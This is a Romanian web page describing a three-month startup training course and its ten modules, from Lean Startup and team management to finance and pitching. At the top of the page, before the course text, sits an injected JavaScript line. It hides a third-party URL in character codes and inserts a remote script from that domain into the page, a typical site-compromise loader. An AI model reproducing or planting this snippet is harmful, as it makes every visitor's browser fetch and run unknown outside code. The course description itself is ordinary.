var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }

10 Module de studii

Cele 10 module pe care le vei parcurge cristalizează principiile, instrumentele și practicile a căror performanță a fost testată și demonstrată și care corespund cu cele mai actuale inovații în materie de dezvoltarea a startupurilor scalabile.

Cursul intensiv de 3 luni va oferi participantilor o serie de instrumente care vor fi utile nu doar în crearea și creșterea unei afaceri, dar și în interacțiunile și deciziile de zi cu zi. Programul va îndruma participanții pas cu pas, de la primele scântei ale unei idei, până la lansarea unui produs viabil.

Participanții vor participa la identificarea noilor produse/piețe, la generarea necesităților și dezvoltarea strategilor de plasare pe piață a produselor. În timpul programului vor învăța cum să efectueze aceste activități colectând și analizând date. Vor învăța să se bazeze pe deciziile din cunoștințe teoretice și practice din antreprenoriat, știința datelor, gândirii de proiectare, marketingului și managementului de proiecte și resurse umane.

Introducere în Antreprenoriat

MODUL 1 (SEPTEMBRIE)

Filozofia Lean Startup, eficacitatea personală, instrumente esențiale pentru antreprenori.

Cum să găsești ideea ta de business

MODUL 2 (SEPTEMBRIE)

Product-Market Fit, Design thinking, metodologia Lean canvas, evaluarea problemelor și nevoilor societății.

Cum să construiești echipa și HR Management

MODUL 3 (SEPTEMBRIE)

Managementul echipei, definirea viziunii, motivarea echipei, colaborarea, edificarea unei culturi de startup coerente.

Analiza pieței și concurenței

MODUL 4 (OCTOMBRIE)

Identificarea grupului țintă, cercetare, analiza tendințelor de piață, instrumente pentru analiza concurenței.

Crearea unui model de business

MODUL 5 (OCTOMBRIE)

Validarea problemei, construirea planului Go-to-Market, Business Model 101.

Marketing și vânzări

MODUL 6 (OCTOMBRIE)

Audiența țintă, branding, analytics, inbound marketing, cold contacting.

Project Management și Planul Operațional

MODUL 7 (OCTOMBRIE)

Metodologia Agile, 4P-uri ale Managementului de proiect, instrumente de task management.

Prototipizarea

MODUL 8 (NOIEMBRIE)

MVP, Wireframing, Fast Iteration.

Finanțe & Planificare financiară

MODUL 9 (NOIEMBRIE)

Cash Flow, Balance Sheet, Breakeven point, P&L Statement, Client funnel.

Pitching

MODUL 10 (NOIEMBRIE)

Storytelling, pitch deck, pitch training pentru investitori.